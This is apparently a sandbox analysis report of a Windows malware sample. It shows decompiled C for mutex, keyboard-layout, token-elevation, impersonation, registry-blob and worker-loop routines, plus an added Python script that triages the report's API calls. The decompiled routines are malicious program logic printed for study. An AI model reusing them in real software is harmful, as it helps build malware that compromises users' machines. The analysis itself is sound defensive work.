            				L009B7EE3(); // executed
            				_t2 = E009B1500(); // executed
            				if(_t2 == 0) {
            					_push(1);
            					L5:
            					E009B4C87();                         // exit path, argument 1 or 0
            					L6:
            					SetErrorMode(1); // executed         // SEM_FAILCRITICALERRORS
            					if(E009B5408() >= 0x600) {
            						_t10 =  *0x9c1228(0, 0x12); // executed   // SHTestTokenMembership(NULL, 0x12)
            						if(_t10 != 0) {
            							if(E009B41C3() == 0) {
            								E009B5162(0x600, __eflags);  // impersonate
            							} else {
            								E009B4C87(0);
            							}
            						}
            					}
            					_t29 =  *0x9c230c; // 0x0
            					if(_t29 == 0) {
            						_t8 = E009B52D4(); // executed   // 1 if the mutex already existed
            						if(_t8 == 0) {
            							E009B5982(_t14, _t20); // executed
            						} else {
            							E009B4C87(0);                // another instance is running
            						}
            					}
            					_t5 = E009B37A8(_t20); // executed   // main worker
            					E009B7EE2(_t5);
            					return 0;
            				}
            				_t24 =  *0x9c22f4; // 0x0
            				if(_t24 != 0 || E009B5204(_t15, _t24) == 0) {
            					goto L6;
            				} else {
            					_push(0);
            					goto L5;
            				}
            			}

            Instruction addresses (one per decompiled line, in order; 0x00000000 = no address): 0x009b437d, 0x009b437d, 0x009b437d, 0x009b437e, 0x009b4383, 0x009b438c, 0x009b43a2, 0x009b43a4, 0x009b43a4, 0x009b43aa, 0x009b43ac, 0x009b43bf, 0x009b43c4, 0x009b43cc, 0x009b43d5, 0x009b43e0, 0x009b43d7, 0x009b43d8, 0x009b43dd, 0x009b43d5, 0x009b43cc, 0x009b43e5, 0x009b43eb, 0x009b43ed, 0x009b43f4, 0x009b43ff, 0x009b43f6, 0x009b43f7, 0x009b43fc, 0x009b43f4, 0x009b4404, 0x009b4409, 0x009b4411, 0x009b4411, 0x009b438e, 0x009b4394, 0x00000000, 0x009b439f, 0x009b439f, 0x00000000, 0x009b439f

            APIs
            • SetErrorMode.KERNELBASE(00000001,?,009B441B,00000000), ref: 009B43AC
            • SHTestTokenMembership.SHELL32(00000000,00000012), ref: 009B43C4
              • Part of subcall function 009B5204: GetKeyboardLayoutList.USER32(00000000,00000000,00000001,00000000,009C0270,?,?,009B19FE), ref: 009B5217
              • Part of subcall function 009B5204: GetKeyboardLayoutList.USER32(00000000,00000000,?,?,009B19FE), ref: 009B5237
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: KeyboardLayoutList$ErrorMembershipModeTestToken
            • String ID:
            • API String ID: 3728304949-0
            • Opcode ID: abc37d2120625f0864889460d2f871a259e666874310763ebf66a2b1c5ce702a
            • Instruction ID: 19564480e167c99d84acc7ac35c9f8089988ccf307b92c26ef847a1123e4cbc2
            • Opcode Fuzzy Hash: abc37d2120625f0864889460d2f871a259e666874310763ebf66a2b1c5ce702a
            • Instruction Fuzzy Hash: 5501AF2019B5269AEB2577B15F03BEE12CC8FD0F72F2C0525B551940A7EE45C842B1B7
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			// Same routine as E009B52D4 below, decompiled from one byte earlier
            			// (0x9b52d3 instead of the real entry 0x9b52d4); the first statement is
            			// the artefact of that misaligned start. See E009B52D4 for the annotated
            			// version.
            			E009B52D3(void* __edx) {
            				short _v6;
            				short _v92;
            				intOrPtr _v117;
            				void* _t10;
            				struct _SECURITY_ATTRIBUTES* _t15;
            
            				_v117 = _v117 + __edx;           // misaligned-entry artefact
            				E009B5E33(0x9c1338, 0x2ae, 0xf, 0x56,  &_v92);
            				_v6 = 0;
            				_t15 = 0;
            				_t10 = CreateMutexW(0, 0,  &_v92); // executed
            				 *0x9c1dc0 = _t10;
            				if(_t10 != 0 && RtlGetLastWin32Error() == 0xb7) {
            					_t15 = 1;
            				}
            				return _t15;
            			}

            Instruction addresses (one per decompiled line, in order): 0x009b52d3, 0x009b52ed, 0x009b52f7, 0x009b52fb, 0x009b5303, 0x009b5309, 0x009b5310, 0x009b531f, 0x009b531f, 0x009b5326

            APIs
            • CreateMutexW.KERNELBASE(00000000,00000000,?,?,?,?,?,00000000), ref: 009B5303
            • RtlGetLastWin32Error.NTDLL ref: 009B5312
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: CreateErrorLastMutexWin32
            • String ID:
            • API String ID: 682235734-0
            • Opcode ID: b4ac11b93a457901a8f1be6f60f2d7ee94e2fdf305e833958dd5072141c955a1
            • Instruction ID: 109388f8b0d1d2a829de2634143687883b6d14943b40c855c39675016099ed08
            • Opcode Fuzzy Hash: b4ac11b93a457901a8f1be6f60f2d7ee94e2fdf305e833958dd5072141c955a1
            • Instruction Fuzzy Hash: 0BF02021E14654AACB219BE89C06FDB3BACEF06390F410162EE05E2182E6908504CBA6
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			// Single-instance check: decode the 0x56-byte mutex name from the table
            			// at 0x9c1338, CreateMutexW it, keep the handle in the global at 0x9c1dc0,
            			// and return 1 when GetLastError() == ERROR_ALREADY_EXISTS (0xb7), i.e.
            			// another instance already holds the mutex. E009B437D exits on 1.
            			E009B52D4() {
            				short _v6;      // NUL terminator for the name
            				short _v92;     // decoded mutex name
            				void* _t8;      // mutex handle
            				struct _SECURITY_ATTRIBUTES* _t11;   // result (decompiler type)
            
            				E009B5E33(0x9c1338, 0x2ae, 0xf, 0x56,  &_v92);
            				_v6 = 0;
            				_t11 = 0;
            				_t8 = CreateMutexW(0, 0,  &_v92); // executed
            				 *0x9c1dc0 = _t8;
            				if(_t8 != 0 && RtlGetLastWin32Error() == 0xb7) {   // ERROR_ALREADY_EXISTS
            					_t11 = 1;
            				}
            				return _t11;
            			}

            Instruction addresses (one per decompiled line, in order): 0x009b52ed, 0x009b52f7, 0x009b52fb, 0x009b5303, 0x009b5309, 0x009b5310, 0x009b531f, 0x009b531f, 0x009b5326

            APIs
            • CreateMutexW.KERNELBASE(00000000,00000000,?,?,?,?,?,00000000), ref: 009B5303
            • RtlGetLastWin32Error.NTDLL ref: 009B5312
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: CreateErrorLastMutexWin32
            • String ID:
            • API String ID: 682235734-0
            • Opcode ID: 314d013d936199fcc67529660a0a8cda835859163bdb621250c62217299a2b95
            • Instruction ID: a7145b4055b5625e21e61fdd2ec9dfd7b4f9eaea2c865d85a1487ef3a35ec582
            • Opcode Fuzzy Hash: 314d013d936199fcc67529660a0a8cda835859163bdb621250c62217299a2b95
            • Instruction Fuzzy Hash: 35F0E561E10618BBD7116BE89D06FDB77ECEF45750F410161FE05D21C5EA50C904C7EA
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 82%
            			// Token elevation query for the process handle _a4: open the token with
            			// TOKEN_QUERY (8) and read information class 0x12 = TokenElevationType
            			// (not TokenIntegrityLevel, which is 25) into a 4-byte DWORD:
            			// 1 = TokenElevationTypeDefault, 2 = Full, 3 = Limited. The sbb/and idiom
            			// masks the value with the call's success; the decompiler's rendering of
            			// that mask is approximate.
            			E009B4DB2(void* _a4) {
            				void _v8;       // TOKEN_ELEVATION_TYPE value
            				void* _v12;     // token handle
            				long _v16;      // returned length
            				signed int _t17;
            
            				_v8 = _v8 & 0x00000000;
            				if(OpenProcessToken(_a4, 8,  &_v12) != 0) {
            					_t17 = GetTokenInformation(_v12, 0x12,  &_v8, 4,  &_v16); // executed
            					asm("sbb eax, eax");
            					_v8 = _v8 &  ~_t17;
            					E009B4BEE(_v12);     // close the token handle
            				}
            				return _v8;
            			}

            Instruction addresses (one per decompiled line, in order): 0x009b4db8, 0x009b4dcd, 0x009b4dde, 0x009b4de9, 0x009b4deb, 0x009b4dee, 0x009b4df3, 0x009b4dfa

            APIs
            • OpenProcessToken.ADVAPI32(009B59AA,00000008,009B59AA,?,009B59AA), ref: 009B4DC5
            • GetTokenInformation.KERNELBASE(009B59AA,00000012(TokenElevationType),00000000,00000004,?,?,009B59AA), ref: 009B4DDE
              • Part of subcall function 009B4BEE: FindCloseChangeNotification.KERNELBASE(00000000,?,009B74C6,00000000,?,009B7522,00000000,00000000,?,009B338D,?,00000000,00000000,009B3561), ref: 009B4BFA
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Token$ChangeCloseFindInformationNotificationOpenProcess
            • String ID:
            • API String ID: 3152771255-0
            • Opcode ID: 03baf30baae853d983473d9976c4130776161b2911d74156906dc7f9f28efd2d
            • Instruction ID: 8f5e5adc6b8003a3b232debf415396575ac96234530be607a3a6514e7ea67396
            • Opcode Fuzzy Hash: 03baf30baae853d983473d9976c4130776161b2911d74156906dc7f9f28efd2d
            • Instruction Fuzzy Hash: C9F0F835E5410CBBDF10DAA0DE05FECBBBCEB04711F1040A1BA04E2091D7309B58AB50
            Uniqueness

            Uniqueness Score: -1.00%
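            The per-function API annotations in this report (OpenProcess(MAXIMUM_ALLOWED) then OpenProcessToken(TOKEN_ALL_ACCESS) then ImpersonateLoggedOnUser in E009B5162, RevertToSelf at the end of E009B79C5, the CreateMutexW/GetLastError pair in E009B52D4, the HKLM REG_BINARY write in E009B5609, the TokenElevationType query in E009B4DB2) are the lines an analyst decodes and correlates first. The script below is an added example, not part of the report or of the sample: it parses lines in the report's "Api.MODULE(args), ref: ADDR" format, names the Win32 constants whose meaning is fixed by the headers, and flags the four behaviours just listed. SAMPLE_TRACE is constructed from annotations on this page, ordered as E009B437D and E009B79C5 would execute them; it is not a trace Joe Sandbox emitted, and the constant tables cover only the values this page uses plus a few common neighbours.

```python
import re

# Meanings fixed by the Win32 headers, keyed by (API name, zero-based argument index).
ARG_NAMES = {
    ("OpenProcess", 0): {0x02000000: "MAXIMUM_ALLOWED", 0x001FFFFF: "PROCESS_ALL_ACCESS",
                         0x00001000: "PROCESS_QUERY_LIMITED_INFORMATION"},
    ("OpenProcessToken", 1): {0x000F01FF: "TOKEN_ALL_ACCESS", 0x00000008: "TOKEN_QUERY",
                              0x00000020: "TOKEN_ADJUST_PRIVILEGES"},
    ("GetTokenInformation", 1): {18: "TokenElevationType", 20: "TokenElevation",
                                 25: "TokenIntegrityLevel"},
    ("RegCreateKeyExW", 0): {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"},
    ("RegCreateKeyExW", 5): {0x00000002: "KEY_SET_VALUE", 0x000F003F: "KEY_ALL_ACCESS"},
    ("RegSetValueExW", 3): {1: "REG_SZ", 3: "REG_BINARY", 4: "REG_DWORD"},
    ("SetErrorMode", 0): {1: "SEM_FAILCRITICALERRORS"},
}

SUBCALL_RE = re.compile(r"^\s*•?\s*Part of subcall function [0-9A-Fa-f]+:\s*")
LINE_RE = re.compile(r"^\s*•?\s*(\w+)\.(\w+)(?:\((.*)\))?,?\s+ref:\s*([0-9A-Fa-f]+)\s*$")

def parse_call(line):
    """Turn one 'Api.MODULE(args), ref: ADDR' annotation into a dict, or None."""
    m = LINE_RE.match(SUBCALL_RE.sub("", line))
    if not m:
        return None
    api, module, args, ref = m.groups()
    values = []
    for a in (args.split(",") if args else []):
        a = re.sub(r"\(.*\)$", "", a.strip())        # drop the sandbox's own '(Name)' hint
        try:
            values.append(int(a, 16))
        except ValueError:
            values.append(None)                      # '?' = value not recovered
    return {"api": api, "module": module, "args": values, "ref": int(ref, 16)}

def decode_args(call):
    """Symbolic names for the arguments ARG_NAMES knows, e.g. ['arg0=MAXIMUM_ALLOWED']."""
    out = []
    for i, v in enumerate(call["args"]):
        names = ARG_NAMES.get((call["api"], i))
        if names and v in names:
            out.append(f"arg{i}={names[v]}")
    return out

def _in_order(apis, *sequence):
    """True if every name in `sequence` occurs in the call list, in that order."""
    pos = 0
    for name in sequence:
        try:
            pos = apis.index(name, pos) + 1
        except ValueError:
            return False
    return True

def triage(lines):
    """Parse annotation lines and return (calls, findings)."""
    calls = [c for c in map(parse_call, lines) if c]
    apis = [c["api"] for c in calls]
    findings = []
    if _in_order(apis, "OpenProcess", "OpenProcessToken", "ImpersonateLoggedOnUser"):
        reverted = _in_order(apis, "ImpersonateLoggedOnUser", "RevertToSelf")
        findings.append("impersonates another process's token"
                        + ("" if reverted else " without RevertToSelf"))
    for a, b in zip(calls, calls[1:]):
        if a["api"] == "CreateMutexW" and b["api"] in ("RtlGetLastWin32Error", "GetLastError"):
            findings.append("single-instance mutex check (CreateMutexW then GetLastError)")
    for c in calls:
        if c["api"] == "GetTokenInformation" and c["args"][1:2] == [18]:
            findings.append("queries TokenElevationType (UAC elevation state)")
        if c["api"] == "RegCreateKeyExW" and c["args"][:1] == [0x80000002]:
            findings.append(f"creates a key under HKEY_LOCAL_MACHINE at {c['ref']:08X}")
        if c["api"] == "RegSetValueExW" and len(c["args"]) > 3 and c["args"][3] == 3:
            findings.append("stores a REG_BINARY value")
    return calls, findings

# Constructed input, modelled on this report's annotations and ordered as the code
# would execute them; not a trace produced by the sandbox.
SAMPLE_TRACE = [
    "• SetErrorMode.KERNELBASE(00000001,?,009B441B,00000000), ref: 009B43AC",
    "• CreateMutexW.KERNELBASE(00000000,00000000,?,?,?,?,?,00000000), ref: 009B5303",
    "• RtlGetLastWin32Error.NTDLL ref: 009B5312",
    "• OpenProcessToken.ADVAPI32(009B59AA,00000008,009B59AA,?,009B59AA), ref: 009B4DC5",
    "• GetTokenInformation.KERNELBASE(009B59AA,00000012(TokenElevationType),00000000,00000004,?,?,009B59AA), ref: 009B4DDE",
    "• RegCreateKeyExW.KERNELBASE(80000002,009C21A0,00000000,00000000,00000000,00000002,00000000,009B18EE,00000000), ref: 009B5621",
    "• RegSetValueExW.KERNELBASE(009B18EE,?,00000000,00000003,009C21F8,?), ref: 009B563B",
    "  • Part of subcall function 009B5162: OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,00000001), ref: 009B519A",
    "• OpenProcessToken.ADVAPI32(00000000,000F01FF,009B7A11,?,?,?,?,?,00000001), ref: 009B51B4",
    "• ImpersonateLoggedOnUser.KERNELBASE(009B7A11,00000000,?), ref: 009B51CB",
    "• GetDriveTypeW.KERNELBASE(00000000,?,?,?,?,?,00000001), ref: 009B7A17",
    "• RevertToSelf.ADVAPI32(?,?,?,?,?,00000001), ref: 009B7A5E",
]

if __name__ == "__main__":
    calls, findings = triage(SAMPLE_TRACE)
    for c in calls:
        print(f"{c['ref']:08X} {c['api']:<24} {' '.join(decode_args(c))}")
    print("findings:", *findings, sep="\n  ")
```

The ordering check is deliberately loose (any OpenProcess followed later by OpenProcessToken and ImpersonateLoggedOnUser), because the report lists calls per function rather than as one timeline; when working from a real API-call log, tighten it to consecutive calls from the same thread.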

            C-Code - Quality: 70%
            			// Registry-backed blob. Strings come from the second table at 0x9c0270.
            			// E009B558B (not shown on this page) reads the value from HKLM
            			// (0x80000002), then from HKCU (0x80000001); an existing value whose
            			// reported _v8 is 3 (REG_BINARY, the type E009B5609 writes below) is
            			// returned as-is. Otherwise a 0x20000-byte buffer is allocated, a string
            			// is formatted into it from a set of globals through the import slot at
            			// 0x9c11b4 (not resolved here), E009B6BB8 derives the blob that is
            			// stored, and E009B5609 writes it as REG_BINARY (3) to HKLM, falling
            			// back to HKCU when the HKLM write fails.
            			E009B1DBB(void* __edx, int* _a4) {
            				char _v8;       // type reported by E009B558B
            				short _v12;
            				char _v28;      // decoded value name (0x10 bytes)
            				short _v30;
            				char _v80;      // decoded key path (0x32 bytes)
            				short _v82;
            				char _v396;     // decoded format string (0x13a bytes)
            				void* _t29;
            				intOrPtr _t35;
            				void* _t39;
            				void* _t46;
            				void* _t53;
            				intOrPtr _t55;  // working buffer
            				void* _t57;
            				void* _t58;
            				int* _t59;      // _a4: receives/passes the data length
            				void* _t60;     // blob
            				void* _t62;
            				void* _t63;
            
            				_t58 = __edx;
            				E009B5E33(0x9c0270, 0x768, 0xc, 0x32,  &_v80);          // key path
            				_v30 = 0;
            				E009B5E33(0x9c0270, 0x902, 5, 0x10,  &_v28);            // value name
            				_t59 = _a4;
            				_v12 = 0;
            				_t29 = E009B558B(0x80000002,  &_v80,  &_v28,  &_v8, _t59); // executed   // try HKLM
            				_t60 = _t29;
            				_t63 = _t62 + 0x3c;
            				if(_t60 != 0) {
            					L2:
            					if(_v8 == 3) {
            						L8:
            						return _t60;                                  // usable value already present
            					}
            					L3:
            					_t55 = E009B494C(0x20000);                       // working buffer
            					if(_t55 != 0) {
            						E009B5E33(0x9c0270, 0x5a0, 9, 0x13a,  &_v396);   // format string
            						_v82 = 0;
            						_t35 =  *0x9c2268; // 0x2b592e8
            						// formatting call through the import at 0x9c11b4; the trailing arguments are globals
            						 *0x9c11b4(_t55, 0x20000,  &_v396, 0x203,  *0x9c2250,  *0x9c2254,  *0x9c226c,  *0x9c2270,  *0x9c2274,  *0x9c2278,  *0x9c227c,  *0x9c2280,  *0x9c2284,  *0x9c2288,  *0x9c228c,  *0x9c22ec,  *0x9c2290, _t35 + 2);
            						_t39 = E009B62A1(_t55);                       // length of the result (doubled below to a byte count)
            						_t57 = _t59;
            						_push(_t39 + _t39);
            						_push(_t55);
            						_push(0x9c0000);
            						_t60 = E009B6BB8(_t58);                       // produce the blob to store
            						E009B4999(_t55);                              // free the working buffer
            						if(_t60 == 0) {
            							goto L4;
            						}
            						_t46 = E009B5609(_t57, 0x80000002,  &_v80,  &_v28, 3, _t60,  *_t59); // executed   // HKLM, REG_BINARY
            						if(_t46 == 0) {
            							E009B5609(_t57, 0x80000001,  &_v80,  &_v28, 3, _t60,  *_t59);           // fall back to HKCU
            						}
            						goto L8;
            					}
            					L4:
            					return 0;
            				}
            				_t53 = E009B558B(0x80000001,  &_v80,  &_v28,  &_v8, _t59); // executed   // try HKCU
            				_t60 = _t53;
            				_t63 = _t63 + 0x14;
            				if(_t60 == 0) {
            					goto L3;
            				}
            				goto L2;
            			}

            APIs
              • Part of subcall function 009B558B: RegOpenKeyExW.KERNELBASE(0000000C,00000007,00000000,00000001,?,009C0270,00000000,?,?,009B2342,80000002,?,?,?,?,009C0270), ref: 009B55A2
              • Part of subcall function 009B558B: RegQueryValueExW.KERNELBASE(?,00000CA1,00000000,009C0270,00000000,?,80000002,?,?,009B2342,80000002,?,?,?,?,009C0270), ref: 009B55BC
              • Part of subcall function 009B558B: RegQueryValueExW.KERNELBASE(?,00000CA1,00000000,009C0270,00000000,?,?,?,009B2342,80000002,?,?,?,?,009C0270,00000CA1), ref: 009B55E4
              • Part of subcall function 009B558B: RegCloseKey.KERNELBASE(?,?,?,009B2342,80000002,?,?,?,?,009C0270,00000CA1,00000007,0000000C,?), ref: 009B55FA
            • _snwprintf.NTDLL ref: 009B1EEC
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: QueryValue$CloseOpen_snwprintf
            • String ID:
            • API String ID: 775465768-0
            • Opcode ID: cf86b24f4655c1c7716ddeeaa4bc558fd6fbb4483d9d005adc87b7c3395b9373
            • Instruction ID: 018f73c6782b2e0948183b92d506ba907ca04badfae7e3c27db7704f35b19c2c
            • Opcode Fuzzy Hash: cf86b24f4655c1c7716ddeeaa4bc558fd6fbb4483d9d005adc87b7c3395b9373
            • Instruction Fuzzy Hash: 9A419272D44209BFDB219BE0DD46FEBBB7CEB48720F400125FA14E6152E6619A11EBA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 87%
            			E009B3561(intOrPtr _a4) {
            				char _v8;
            				char _v12;
            				char _v16;
            				void* _t30;
            				long _t32;
            				void* _t39;
            				void* _t41;
            				void* _t46;
            				char _t51;
            				signed int _t54;
            				char _t56;
            				signed int _t59;
            				signed int _t60;
            				void* _t62;
            				void* _t67;
            				void* _t68;
            				intOrPtr _t74;
            				intOrPtr _t80;
            
            				_t66 = _a4;
            				_t30 = E009B7568(_a4,  &_v12,  &_v16,  &_v8, 0xffffffff);
            				_t68 = _t67 + 0x14;
            				if( *0x9c1d84 == 0) {
            					do {
            						if(_t30 == 0) {
            							_t32 = RtlGetLastWin32Error();
            							__eflags = _t32 - 0x26;
            							if(_t32 == 0x26) {
            								E009B2E8C(_t66, _v8);
            								goto L22;
            							}
            						} else {
            							_push(0);
            							E009B7636(_v8, _v12);
            							_t56 = _v8;
            							_t68 = _t68 + 0xc;
            							if( *0x9c22d8 == 2 &&  *((intOrPtr*)(_t56 + 0x150)) == 2) {
            								 *((intOrPtr*)(_t56 + 0x20)) =  *((intOrPtr*)(_t56 + 0x20)) - _v12;
            								asm("sbb [ecx+0x24], edi");
            								_t51 = _v8;
            								_t59 =  *0x9c22dc; // 0x0
            								_t60 = _t59 << 0x14;
            								_t74 =  *((intOrPtr*)(_t51 + 0x24));
            								if(_t74 < 0 || _t74 <= 0 &&  *((intOrPtr*)(_t51 + 0x20)) <= _t60) {
            									_push( *((intOrPtr*)(_t51 + 0x24)));
            									E009B7636(_t51,  *((intOrPtr*)(_t51 + 0x20)));
            									_t68 = _t68 + 0xc;
            								} else {
            									_push(0);
            									E009B7636(_t51, _t60);
            									_t61 = _v8;
            									_t68 = _t68 + 0xc;
            									_t54 =  *0x9c22dc; // 0x0
            									 *((intOrPtr*)(_t61 + 0x20)) =  *((intOrPtr*)(_v8 + 0x20)) - (_t54 << 0x14);
            									asm("sbb [ecx+0x24], edi");
            								}
            								_t56 = _v8;
            							}
            							_t39 =  *((intOrPtr*)(_t56 + 0x154)) - 1;
            							if(_t39 == 0) {
            								E009B3236(_t66, _t56, 2); // executed
            								goto L19;
            							} else {
            								_t41 = _t39 - 1;
            								if(_t41 == 0) {
            									__eflags =  *0x9c22d8 - 1; // 0x0
            									_t62 = 3;
            									_t44 =  ==  ? _t62 : 1;
            									E009B36AB(_t62, __eflags, _t56, _v12,  ==  ? _t62 : 1); // executed
            									L19:
            									_t68 = _t68 + 0xc;
            								} else {
            									_t46 = _t41 - 1;
            									if(_t46 == 0) {
            										E009B3722(_t56, 4); // executed
            										goto L22;
            									} else {
            										_t79 = _t46 == 1;
            										if(_t46 == 1) {
            											E009B3150(_t79, _t66, _t56); // executed
            											L22:
            										}
            									}
            								}
            							}
            						}
            						_t30 = E009B7568(_t66,  &_v12,  &_v16,  &_v8, 0xffffffff);
            						_t68 = _t68 + 0x14;
            						_t80 =  *0x9c1d84; // 0x1
            					} while (_t80 == 0);
            				}
            				asm("lock dec dword [esi+0x8]");
            				return 0;
            			}

            APIs
              • Part of subcall function 009B7568: GetQueuedCompletionStatus.KERNEL32(?,?,?,?,?,?,009B357F,?,?,?,?,000000FF), ref: 009B757D
            • RtlGetLastWin32Error.NTDLL ref: 009B3665
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: CompletionErrorLastQueuedStatusWin32
            • String ID:
            • API String ID: 2679338362-0
            • Opcode ID: a7195bbd6e637c954a2c0ccd57b42a089f250040100b561d584d5b34ff8873c5
            • Instruction ID: 006a5975ee44aa1bff688e70c62e0cde905a4675306bbed381907622c6410b48
            • Opcode Fuzzy Hash: a7195bbd6e637c954a2c0ccd57b42a089f250040100b561d584d5b34ff8873c5
            • Instruction Fuzzy Hash: 524193B2804108FFDB25DBA8CF47EEA77ACEB85320F10426AF41596251EB31DB41D765
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 91%
            			E009B4FEC(void* __edx) {
            				char _v8;
            				short _v12;
            				short _v28;
            				char _v92;
            				WCHAR* _t11;
            				char _t12;
            				void* _t14;
            				void* _t30;
            				WCHAR* _t31;
            
            				_t30 = __edx;
            				_t11 = E009B494C(0x22);
            				_t31 = _t11;
            				if(_t31 != 0) {
            					_t12 = E009B576A(); // executed
            					_v8 = _t12;
            					_t14 = E009B69B3(0x539,  &_v8, 4);
            					E009B49D3( &_v92, 0, 0x40);
            					E009B4C25(_t30,  &_v92);
            					E009B5E33(0x9c1338, 0x5d8, 5, 0x10,  &_v28);
            					_v12 = 0;
            					_push(_v8);
            					wsprintfW(_t31,  &_v28, E009B69B3(_t14,  &_v92, E009B628E( &_v92)));
            					return _t31;
            				}
            				return _t11;
            			}

            APIs
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
              • Part of subcall function 009B576A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000022,?,009B5007,00000000,00000001), ref: 009B578D
            • wsprintfW.USER32 ref: 009B5072
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Heap$CreateInformationProcessVolumewsprintf
            • String ID:
            • API String ID: 2230357944-0
            • Opcode ID: 8a7e907d418b35188f6fb1f3e1af7546f36a37207d328f44dc8d438628d9c8bc
            • Instruction ID: 5d89b889a04b4a1fde876043de00cebc3dae97f17b6aec88a252bd9ded7e9529
            • Opcode Fuzzy Hash: 8a7e907d418b35188f6fb1f3e1af7546f36a37207d328f44dc8d438628d9c8bc
            • Instruction Fuzzy Hash: DC016D72A40608BAE711B7E48E06FEFB76C9F84B21F040156BB00E6182EA64961047A5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 89%
            			E009B3722(intOrPtr _a4, intOrPtr _a8) {
            				long _t9;
            				intOrPtr _t11;
            				intOrPtr _t15;
            				intOrPtr _t18;
            				void* _t19;
            				void* _t20;
            				intOrPtr _t22;
            
            				_t18 = _a4;
            				 *((intOrPtr*)(_t18 + 0x150)) = 3;
